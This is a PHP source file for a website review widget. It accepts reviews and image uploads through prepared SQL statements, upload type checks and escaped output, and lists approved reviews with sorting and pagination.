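<?php
// Review widget: handles review submission (POST) and renders the approved
// reviews for one page (GET), including sorting and optional pagination.
// The two includes are expected to provide $db (a PDO connection),
// notifyAdmin() and the configuration constants referenced below
// (one_review_per_reviewer, reviews_approval_required, images_directory,
// max_allowed_upload_image_size) — they are not visible in this file.
include 'admin/includes/controller.php';
include 'includes/functions.php';

/**
 * Convert a datetime string into a human readable "time elapsed" string,
 * e.g. "3 days ago" or "just now".
 *
 * @param string $datetime Any date string accepted by DateTime (here the
 *                         review's submit_date column).
 * @param bool   $full     When true every non-zero unit is listed
 *                         ("1 year, 2 months ago"); when false only the
 *                         largest non-zero unit is returned.
 * @return string
 */
function time_elapsed_string($datetime, $full = false)
{
    $now = new DateTime;
    $ago = new DateTime($datetime);
    $diff = $now->diff($ago);

    // DateInterval has no week unit: derive weeks from the day count and keep
    // the remainder as days. Kept in locals instead of a dynamic property on
    // the interval object.
    $weeks = (int) floor($diff->d / 7);
    $units = [
        ['year', $diff->y],
        ['month', $diff->m],
        ['week', $weeks],
        ['day', $diff->d - $weeks * 7],
        ['hour', $diff->h],
        ['minute', $diff->i],
        ['second', $diff->s],
    ];

    $parts = [];
    foreach ($units as [$label, $value]) {
        if ($value) {
            $parts[] = $value . ' ' . $label . ($value > 1 ? 's' : '');
        }
    }
    if (!$full) {
        // Largest unit first, so the first entry is the most significant one.
        $parts = array_slice($parts, 0, 1);
    }

    return $parts ? implode(', ', $parts) . ' ago' : 'just now';
}

// Page ID needs to exist, this is used to determine which reviews are for which page.
if (isset($_GET['page_id'])) {
    // The page ID is only ever used as an integer key (it is bound with
    // PDO::PARAM_INT below), so normalise it once. This also keeps it from
    // carrying markup into the admin alert, the notification email and the
    // cookie name, all of which embed it verbatim.
    $page_id = (int) $_GET['page_id'];

    // IF the user submits the review form. Array-valued fields (name[]=...)
    // are not a valid submission and fall through to the listing.
    if (isset($_POST['name'], $_POST['rating'], $_POST['content'])
        && is_string($_POST['name']) && is_string($_POST['content'])) {
        // Check if user has already posted a review
        if (isset($_COOKIE['review' . $page_id]) && one_review_per_reviewer) {
            exit('You have already posted a review!');
        }

        // The form offers 1-5 stars; anything else is rejected before it
        // reaches the database. str_repeat() in the listing below would throw
        // on a negative count, so the range check also protects rendering.
        $rating = filter_var($_POST['rating'], FILTER_VALIDATE_INT, [
            'options' => ['min_range' => 1, 'max_range' => 5],
        ]);
        if ($rating === false) {
            exit('Please provide a rating between 1 and 5!');
        }

        // Insert a new review
        $stmt = $db->prepare('INSERT INTO reviews (page_id, name, content, rating, submit_date, approved) VALUES (?,?,?,?,NOW(),?)');
        $approved = reviews_approval_required ? 0 : 1;
        $stmt->execute([$page_id, $_POST['name'], $_POST['content'], $rating, $approved]);
        // Retrieve the ID of the review
        $id = $db->lastInsertId();

        // Check if the user has uploaded images
        if (isset($_FILES['images']) && is_array($_FILES['images']['name'])) {
            // Accepted image types, mapped to the extension the file is stored
            // under. The extension comes from the detected type and never from
            // the client supplied filename, so an upload cannot be written
            // under an executable extension inside the web root.
            $allowed_types = [
                IMAGETYPE_GIF => 'gif',
                IMAGETYPE_JPEG => 'jpg',
                IMAGETYPE_PNG => 'png',
                IMAGETYPE_WEBP => 'webp',
            ];
            $count = count($_FILES['images']['name']);
            for ($i = 0; $i < $count; $i++) {
                $tmp = $_FILES['images']['tmp_name'][$i] ?? '';
                $error = $_FILES['images']['error'][$i] ?? UPLOAD_ERR_NO_FILE;
                if ($tmp === '' || $error !== UPLOAD_ERR_OK) {
                    continue;
                }
                // Size limit is max_allowed_upload_image_size (configured in the includes).
                if ($_FILES['images']['size'][$i] > max_allowed_upload_image_size) {
                    continue;
                }
                // Check to make sure the image is valid and of an accepted type
                $info = getimagesize($tmp);
                if ($info === false || !isset($allowed_types[$info[2]])) {
                    continue;
                }
                $ext = $allowed_types[$info[2]];
                // The image name will contain a unique code to prevent multiple images with the same name.
                $image_path = images_directory . sha1(uniqid() . $id . $i) . '.' . $ext;
                // Only record the image if it was actually written to disk;
                // move_uploaded_file() also refuses anything that was not
                // uploaded through this request.
                if (!file_exists($image_path) && move_uploaded_file($tmp, $image_path)) {
                    // Insert image info into the database (review_id, path)
                    $stmt = $db->prepare('INSERT INTO images VALUES (NULL, ?, ?)');
                    $stmt->execute([$id, $image_path]);
                }
            }
        }

        // Create a notification for the admin
        $date = date('Y-m-d H:i:s');
        $qry = "INSERT INTO alerts (name, type, message, status, date) VALUES (?,?,?,?,?)";
        $new_user_stmt = $db->prepare($qry);
        $new_user_stmt->execute(['System Alert', 'alert', 'New Review Posted on <a href="/post.php?id=' . $page_id . '">post ID ' . $page_id . '</a>', 'unread', $date]);
        // Send notification email to admin
        notifyAdmin('New Review Added', 'A new review has been posted on <a href="/post.php?id=' . $page_id . '">post ID' . $page_id . '</a>. Please go to the admin panel and moderate it.');
        // Set cookie to prevent user from writing multiple reviews on the same page
        setcookie('review' . $page_id, '1', time() + (10 * 365 * 24 * 60 * 60));
        // End the output below, no need to execute the code after that.
        exit('Your review has been submitted!');
    }

    // If the limit variables exist add the LIMIT clause to the SQL statement.
    // Both values are only meaningful as positive integers; they are
    // normalised once here and reused for the SQL binding and the pagination
    // markup below (a negative LIMIT offset would be a SQL error).
    $limit = '';
    $current_page = 1;
    $per_page = 0;
    if (isset($_GET['current_pagination_page'], $_GET['reviews_per_pagination_page'])) {
        $current_page = max(1, (int) $_GET['current_pagination_page']);
        $per_page = max(1, (int) $_GET['reviews_per_pagination_page']);
        $limit = 'LIMIT :current_pagination_page,:reviews_per_pagination_page';
    }

    // Sort options are a fixed lookup; the user value is only a key into it
    // and never reaches the SQL text itself.
    $sort_options = [
        'newest' => 'ORDER BY r.submit_date DESC',
        'oldest' => 'ORDER BY r.submit_date ASC',
        'rating_highest' => 'ORDER BY r.rating DESC',
        'rating_lowest' => 'ORDER BY r.rating ASC',
    ];
    $sort_key = isset($_GET['sort_by']) && is_string($_GET['sort_by']) ? $_GET['sort_by'] : '';
    // By default order by the submit date (newest)
    $sort_by = $sort_options[$sort_key] ?? 'ORDER BY submit_date DESC';

    // Prepare statement that will secure our SQL
    $stmt = $db->prepare('SELECT r.*, GROUP_CONCAT(i.path) AS images FROM reviews r LEFT JOIN images i ON i.review_id = r.id WHERE r.page_id = :page_id AND r.approved = 1 GROUP BY r.id ' . $sort_by . ' ' . $limit);
    if ($limit) {
        // Determine which page the user is on and bind the value in to our SQL statement
        $stmt->bindValue(':current_pagination_page', ($current_page - 1) * $per_page, PDO::PARAM_INT);
        // How many reviews will show on each pagination page
        $stmt->bindValue(':reviews_per_pagination_page', $per_page, PDO::PARAM_INT);
    }
    $stmt->bindValue(':page_id', $page_id, PDO::PARAM_INT);
    $stmt->execute();
    $reviews = $stmt->fetchAll(PDO::FETCH_ASSOC);

    // Get the overall rating and total amount of reviews
    $stmt = $db->prepare('SELECT AVG(rating) AS overall_rating, COUNT(*) AS total_reviews FROM reviews WHERE page_id = ? AND approved = 1');
    $stmt->execute([$page_id]);
    $reviews_info = $stmt->fetch(PDO::FETCH_ASSOC);

    // Retrieve the filters (word -> replacement pairs applied to review text)
    $stmt = $db->prepare('SELECT * FROM filters');
    $stmt->execute();
    $filters = $stmt->fetchAll(PDO::FETCH_ASSOC);
} else {
    exit('Please provide the page ID.');
}
?>
<div class="overall_rating">
    <span class="num"><?=number_format($reviews_info['overall_rating'] ?? 0, 1)?></span>
    <span class="stars"><?=str_repeat('★', (int) round($reviews_info['overall_rating'] ?? 0))?></span>
    <span class="total"><?=$reviews_info['total_reviews']?> <?=($reviews_info['total_reviews'] == 1) ? 'review' : 'reviews'?></span>
</div>
<div class="con">
    <a href="#" class="write_review_btn fw-light">Write Review</a>
    <span></span>
    <label for="sort_by">Sort By</label>
    <select class="sort_by w-25 mb-0" id="sort_by">
        <option value="newest"<?=$sort_key === 'newest' ? ' selected' : ''?>>Newest</option>
        <option value="oldest"<?=$sort_key === 'oldest' ? ' selected' : ''?>>Oldest</option>
        <option value="rating_highest"<?=$sort_key === 'rating_highest' ? ' selected' : ''?>>Rating - High to Low</option>
        <option value="rating_lowest"<?=$sort_key === 'rating_lowest' ? ' selected' : ''?>>Rating - Low to High</option>
    </select>
</div>
<div class="write_review">
    <form>
        <input name="name" type="text" placeholder="Your Name" required>
        <input name="rating" class="rating" type="number" required>
        <div class="stars">
            <?php for ($i = 1; $i <= 5; $i++): ?>
            <span class="star" data-id="<?=$i?>">★</span>
            <?php endfor; ?>
        </div>
        <textarea name="content" placeholder="Write your review here..." required></textarea>
        <label class="fw-light" for="images">Upload Images? Make sure images are square - 50px by 50px.</label>
        <input class="form-control" type="file" name="images[]" id="images" accept="image/*" multiple>
        <button class="fw-light" type="submit">Submit Review</button>
    </form>
</div>
<?php foreach ($reviews as $review): ?>
<div class="review">
    <h4 class="name"><?=htmlspecialchars($review['name'], ENT_QUOTES)?></h4>
    <div>
        <span class="rating"><?=str_repeat('★', max(0, (int) $review['rating']))?></span>
        <span class="date"><?=time_elapsed_string($review['submit_date'])?></span>
    </div>
    <p class="content fw-light"><?=str_ireplace(array_column($filters, 'word'), array_column($filters, 'replacement'), nl2br(htmlspecialchars($review['content'], ENT_QUOTES)))?></p>
    <div class="images">
        <?php // GROUP_CONCAT yields NULL for a review without images. ?>
        <?php foreach (explode(',', $review['images'] ?? '') as $image): ?>
        <?php if (!empty($image)): ?>
        <img src="/<?=htmlspecialchars($image, ENT_QUOTES)?>" width="70" alt="">
        <?php endif; ?>
        <?php endforeach; ?>
    </div>
    <div class="image"></div>
</div>
<?php endforeach; ?>
<?php if (empty($reviews)): ?>
<p class="no_reviews">No reviews have yet been posted.</p>
<?php endif; ?>
<?php if ($limit): ?>
<div class="pagination">
    <?php if ($current_page > 1): ?>
    <a class="rounded-0 fw-light" href="#" data-pagination_page="<?=$current_page - 1?>" data-records_per_page="<?=$per_page?>"> Prev </a>
    <?php endif; ?>
    <div class="fw-light">Page <?=$current_page?></div>
    <?php if ($current_page * $per_page < $reviews_info['total_reviews']): ?>
    <a class="rounded-0 fw-light" href="#" data-pagination_page="<?=$current_page + 1?>" data-records_per_page="<?=$per_page?>"> Next </a>
    <?php endif; ?>
</div>
<?php endif; ?>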